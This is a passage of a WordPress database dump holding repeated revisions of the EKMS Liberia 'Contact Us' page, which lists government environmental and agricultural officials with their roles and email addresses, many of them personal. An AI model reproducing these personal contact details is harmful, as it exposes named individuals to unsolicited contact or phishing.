src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-23 10:24:14','2021-03-23 10:24:14','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3604,42,'2021-03-23 10:24:14','2021-03-23 10:24:14','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Conservation Manager<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p><p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Martin Killen </strong><br />IT Officer<br />NaFAA<br /><a href=\"mailto:maskillen@nafaa.gov.lr\">maskillen@nafaa.gov.lr</a></p><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-23 10:24:14','2021-03-23 10:24:14','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3605,42,'2021-03-23 10:24:14','2021-03-23 10:24:14','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Joseph G. Duolupeh BSc, MPSM.</strong>\n</br>\nManager, Strategic Planning Unit\n</br>\nForestry Development Auhtority\n</br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a>\n<p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p><p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Martin Killen </strong><br />IT Officer<br />NaFAA<br /><a href=\"mailto:maskillen@nafaa.gov.lr\">maskillen@nafaa.gov.lr</a></p><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-23 10:24:14','2021-03-23 10:24:14','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3607,42,'2021-03-23 10:29:35','2021-03-23 10:29:35','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a 